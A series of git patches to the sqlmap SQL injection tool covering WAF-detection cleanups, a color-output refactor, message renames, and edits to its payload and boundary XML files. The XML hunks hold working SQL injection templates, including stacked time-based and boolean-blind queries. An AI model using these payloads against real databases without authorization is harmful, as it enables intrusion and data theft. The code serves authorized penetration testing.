ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py -29ba81741fd7e220a95fe7c5fae76e1a waf/cloudfront.py +a8affab0838c6a1fe683d5b7333d7a69 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py -0182d23b34cf903537f77f4ec4b144bf waf/distil.py +67256152eef36a85498b49a1f0e4e328 waf/distil.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 9760a22990f55ab51ea4eedabd939055 waf/dotdefender.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py @@ -451,7 +451,7 @@ dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py a687449cd4e45f69e33b13d41e021480 waf/uspses.py -ab329be0231efdd360ebabd24c0e5315 waf/varnish.py +2d2740972d887d099e9cc8f132a8f147 waf/varnish.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py diff --git a/waf/aesecure.py b/waf/aesecure.py index 083d1aad445..18b87bfaf14 100644 --- a/waf/aesecure.py +++ b/waf/aesecure.py @@ -5,9 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "aeSecure (aeSecure)" diff --git a/waf/cloudfront.py b/waf/cloudfront.py index d7ddc807ed4..462f909acf3 100644 --- a/waf/cloudfront.py +++ b/waf/cloudfront.py @@ -7,7 +7,6 @@ import re -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "CloudFront (Amazon)" diff --git a/waf/distil.py b/waf/distil.py index 25e1908d865..064425dcf5e 100644 --- a/waf/distil.py +++ b/waf/distil.py @@ -5,9 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "Distil Web Application Firewall Security (Distil Networks)" diff --git a/waf/varnish.py b/waf/varnish.py index 62965755bdf..8617cd802d7 100644 --- a/waf/varnish.py +++ b/waf/varnish.py @@ -7,7 +7,6 @@ import re -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "Varnish FireWall (OWASP)" From 71448b1c169314f633e8b422ace127498792f3a7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Sep 2018 09:45:04 +0200 Subject: [PATCH 281/428] Minor refactoring --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 44 ++++++++++++--------------------- txt/checksum.md5 | 4 +-- 3 files changed, 19 insertions(+), 31 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7c91cb454cd..c6d1307d5e1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.20" +VERSION = "1.2.9.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 24533f249d2..a2af36e2b64 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -130,6 +130,16 @@ def output_colorized(self, message): ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) + def _reset(self, message): + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + + return reset + def colorize(self, message, levelno): if levelno in self.level_map and self.is_tty: bg, fg, bold = self.level_map[levelno] @@ -162,51 +172,29 @@ def colorize(self, message, levelno): match = re.search(r"\A\s*\[([\d:]+)\]", message) # time if match: time = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, reset)), 1) + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, self._reset(message))), 1) match = re.search(r"\[(#\d+)\]", message) # counter if match: counter = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, self._reset(message))), 1) if level != "PAYLOAD": if any(_ in message for _ in ("parsed DBMS error message",)): string = re.search(r": '(.+)'", message).group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) else: for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted string = match.group(1) - if not message.endswith(self.reset): - reset = self.reset - elif self.bold in message: # bold - reset = self.reset + self.bold - else: - reset = self.reset - message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) if prefix: message = "%s%s" % (prefix, message) + message = message.replace("%s]" % self.bold, "]%s" % self.bold) # dirty patch + return message def format(self, record): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a8f816ad911..83c7b7ff198 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -03a73c87322c0165d98bcc1df2794e9f lib/core/settings.py +3698f90905c46eb938cf0b0f5235132f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -287,7 +287,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py 23d845e9f937f2a31c43767b8a8fcff6 tamper/xforwardedfor.py -b422795c5e589decec725963e480ffba thirdparty/ansistrm/ansistrm.py +1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From a5e3dce26fc336de42bee06bdf0d34c0386fd6c1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Sep 2018 10:01:31 +0200 Subject: [PATCH 282/428] Proper naming --- doc/CHANGELOG.md | 8 ++++---- extra/wafdetectify/wafdetectify.py | 2 +- lib/controller/checks.py | 20 ++++++++++---------- lib/core/option.py | 2 +- lib/core/settings.py | 8 ++++---- lib/parse/cmdline.py | 4 ++-- lib/request/connect.py | 6 +++--- txt/checksum.md5 | 12 ++++++------ 8 files changed, 31 insertions(+), 31 deletions(-) diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index 1e3284055da..88bbcf56e19 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -3,7 +3,7 @@ * Implemented support for automatic decoding of page content through detected charset. * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Major improvements to program stabilization based on user reports. -* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. +* Added new tampering scripts avoiding popular WAF/IPS mechanisms. * Fixed major bug with DNS leaking in Tor mode. * Added wordlist compilation made of the most popular cracking dictionaries. * Implemented multi-processor hash cracking routine(s). @@ -23,7 +23,7 @@ * Added option `--csv-del` for manually setting delimiting character used in CSV output. * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. * Added switch `--smart` for conducting through tests only in case of positive heuristic(s). -* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. +* Added switch `--check-waf` for checking of existence of WAF/IPS protection. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables. * Major improvements to switches `--tables` and `--columns`. @@ -55,7 +55,7 @@ * Added option `--host` to set the HTTP Host header value. * Added switch `--hostname` to turn on retrieval of DBMS server hostname. * Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. -* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection. * Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). * Added switch `--invalid-bignum` for usage of big numbers while invalidating values. * Added switch `--invalid-logical` for usage of logical operations while invalidating values. @@ -78,7 +78,7 @@ * Added option `--skip` to skip testing of given parameter(s). * Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. * Added switch `--skip-urlencode` to skip URL encoding of payload data. -* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection. * Added switch `--smart` to conduct thorough tests only if positive heuristic(s). * Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). * Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index f75c9f0a844..68cdcb93bdf 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -107,7 +107,7 @@ def main(): continue if function(get_page): - print colorize("[!] WAF/IPS/IDS identified as '%s'" % product) + print colorize("[!] WAF/IPS identified as '%s'" % product) found = True if not found: diff --git a/lib/controller/checks.py b/lib/controller/checks.py index cff287cdaf5..56351fd8c3d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -896,7 +896,7 @@ def _(): kb.injection = injection - for i in xrange(conf.level): + for level in xrange(conf.level): while True: randInt1, randInt2, randInt3 = (_() for j in xrange(3)) @@ -1338,7 +1338,7 @@ def checkWaf(): if _ is not None: if _: warnMsg = "previous heuristics detected that the target " - warnMsg += "is protected by some kind of WAF/IPS/IDS" + warnMsg += "is protected by some kind of WAF/IPS" logger.critical(warnMsg) return _ @@ -1346,7 +1346,7 @@ def checkWaf(): return None infoMsg = "checking if the target is protected by " - infoMsg += "some kind of WAF/IPS/IDS" + infoMsg += "some kind of WAF/IPS" logger.info(infoMsg) retVal = False @@ -1378,12 +1378,12 @@ def checkWaf(): if retVal: warnMsg = "heuristics detected that the target " - warnMsg += "is protected by some kind of WAF/IPS/IDS" + warnMsg += "is protected by some kind of WAF/IPS" logger.critical(warnMsg) if not conf.identifyWaf: message = "do you want sqlmap to try to detect backend " - message += "WAF/IPS/IDS? [y/N] " + message += "WAF/IPS? [y/N] " if readInput(message, default='N', boolean=True): conf.identifyWaf = True @@ -1407,7 +1407,7 @@ def identifyWaf(): kb.testMode = True infoMsg = "using WAF scripts to detect " - infoMsg += "backend WAF/IPS/IDS protection" + infoMsg += "backend WAF/IPS protection" logger.info(infoMsg) @cachedmethod @@ -1434,7 +1434,7 @@ def _(*args, **kwargs): continue try: - logger.debug("checking for WAF/IPS/IDS product '%s'" % product) + logger.debug("checking for WAF/IPS product '%s'" % product) found = function(_) except Exception, ex: errMsg = "exception occurred while running " @@ -1444,7 +1444,7 @@ def _(*args, **kwargs): found = False if found: - errMsg = "WAF/IPS/IDS identified as '%s'" % product + errMsg = "WAF/IPS identified as '%s'" % product logger.critical(errMsg) retVal.append(product) @@ -1456,7 +1456,7 @@ def _(*args, **kwargs): with openFile(filename, "w+b") as f: f.write(kb.wafSpecificResponse) - message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename + message = "WAF/IPS specific response can be found in '%s'. " % filename message += "If you know the details on used protection please " message += "report it along with specific response " message += "to '%s'" % DEV_EMAIL_ADDRESS @@ -1473,7 +1473,7 @@ def _(*args, **kwargs): if not choice: raise SqlmapUserQuitException else: - warnMsg = "WAF/IPS/IDS product hasn't been identified" + warnMsg = "WAF/IPS product hasn't been identified" logger.warn(warnMsg) kb.testType = None diff --git a/lib/core/option.py b/lib/core/option.py index 3241edf9ebb..5bd75098740 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -824,7 +824,7 @@ def _setTamperingFunctions(): def _setWafFunctions(): """ - Loads WAF/IPS/IDS detecting functions from script(s) + Loads WAF/IPS detecting functions from script(s) """ if conf.identifyWaf: diff --git a/lib/core/settings.py b/lib/core/settings.py index c6d1307d5e1..6a133d608e9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.21" +VERSION = "1.2.9.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -45,10 +45,10 @@ DIFF_TOLERANCE = 0.05 CONSTANT_RATIO = 0.9 -# Ratio used in heuristic check for WAF/IPS/IDS protected targets +# Ratio used in heuristic check for WAF/IPS protected targets IDS_WAF_CHECK_RATIO = 0.5 -# Timeout used in heuristic check for WAF/IPS/IDS protected targets +# Timeout used in heuristic check for WAF/IPS protected targets IDS_WAF_CHECK_TIMEOUT = 10 # Lower and upper values for match ratio in case of stable page @@ -531,7 +531,7 @@ # Value to look for in response to CHECK_INTERNET_ADDRESS CHECK_INTERNET_VALUE = "IP Address Details" -# Vectors used for provoking specific WAF/IPS/IDS behavior(s) +# Vectors used for provoking specific WAF/IPS behavior(s) WAF_ATTACK_VECTORS = ( "", # NIL "search=", diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 24dfa7d6b59..4570b9996f1 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -635,7 +635,7 @@ def cmdLineParser(argv=None): help="Use Google dork results from specified page number") miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", - help="Make a thorough testing for a WAF/IPS/IDS protection") + help="Make a thorough testing for a WAF/IPS protection") miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true", help="Display list of available tamper scripts") @@ -650,7 +650,7 @@ def cmdLineParser(argv=None): help="Safely remove all content from sqlmap data directory") miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", - help="Skip heuristic detection of WAF/IPS/IDS protection") + help="Skip heuristic detection of WAF/IPS protection") miscellaneous.add_option("--smart", dest="smart", action="store_true", help="Conduct thorough tests only if positive heuristic(s)") diff --git a/lib/request/connect.py b/lib/request/connect.py index 711a76effbe..d114663b7c1 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -649,7 +649,7 @@ class _(dict): warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests") kb.droppingRequests = True warnMsg = "connection timed out to the target URL" elif "Connection reset" in tbMsg: @@ -658,7 +658,7 @@ class _(dict): conf.disablePrecon = True if kb.testMode: - singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests") + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests") kb.droppingRequests = True warnMsg = "connection reset to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: @@ -1235,7 +1235,7 @@ def _randomizeParameter(paramString, randomParameter): warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " - warnMsg += "behavior in custom WAF/IPS/IDS solutions" + warnMsg += "behavior in custom WAF/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondUrl: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 83c7b7ff198..7cdd4e99d57 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,9 +22,9 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -1c7e6968f71214f8a0355420f3914f27 extra/wafdetectify/wafdetectify.py +c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -2058987606ad75435c69d28cab11ef9e lib/controller/checks.py +0d4c9c5936d0c063f4b08318f26ad5ca lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -43,14 +43,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -62fb1b8e7a82c726eb9631daac4c82e9 lib/core/option.py +c59c0bfccf3e906564d82adf1fcd17de lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3698f90905c46eb938cf0b0f5235132f lib/core/settings.py +1778dd902fbe5392377fd9b723898bbb lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -61,7 +61,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -7b2a20d7f149cc2522275e5df23bdc54 lib/parse/cmdline.py +fc5a42940327dd3f40a780c865b6b136 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -84f9cb02454fa21a619ccd2b3fd294d4 lib/request/connect.py +b744d840de253c05e808a72d6d11dc5d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 35d9ed84769111738bb817e0914b01c559b7b82b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Sep 2018 10:30:58 +0200 Subject: [PATCH 283/428] Cleaning a mess with stacked queries and pre-WHERE boundaries --- lib/core/settings.py | 2 +- lib/parse/payloads.py | 4 ++ txt/checksum.md5 | 10 ++--- xml/boundaries.xml | 36 +++++++++++++++++ xml/payloads/boolean_blind.xml | 18 ++++----- xml/payloads/stacked_queries.xml | 68 ++++++++++++++++---------------- 6 files changed, 89 insertions(+), 49 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6a133d608e9..cdb05523a55 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.22" +VERSION = "1.2.9.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index ee4d8573d13..6ea796060a0 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -6,6 +6,7 @@ """ import os +import re from xml.etree import ElementTree as et @@ -17,6 +18,9 @@ from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + if tag in ("clause", "where"): text = text.split(',') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7cdd4e99d57..0dd04c2cd66 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1778dd902fbe5392377fd9b723898bbb lib/core/settings.py +4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py +f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py @@ -471,13 +471,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml +3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml +1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml -3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml +82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 8f2351412bb..857551e6bbe 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -413,6 +413,42 @@ Formats: '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )+' + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 00ba460f69b..7b9e5b46ee1 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -1386,7 +1386,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1407,7 +1407,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1428,7 +1428,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) @@ -1449,7 +1449,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 @@ -1469,7 +1469,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] @@ -1491,7 +1491,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) @@ -1513,7 +1513,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL @@ -1533,7 +1533,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;IIF([INFERENCE],1,1/0) @@ -1553,7 +1553,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END diff --git a/xml/payloads/stacked_queries.xml b/xml/payloads/stacked_queries.xml index 2ecd2ef49b8..1471df7d057 100644 --- a/xml/payloads/stacked_queries.xml +++ b/xml/payloads/stacked_queries.xml @@ -7,7 +7,7 @@ 4 2 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -28,7 +28,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -48,7 +48,7 @@ 4 3 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -69,7 +69,7 @@ 4 4 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -89,7 +89,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -109,7 +109,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -128,7 +128,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -149,7 +149,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -169,7 +169,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -189,7 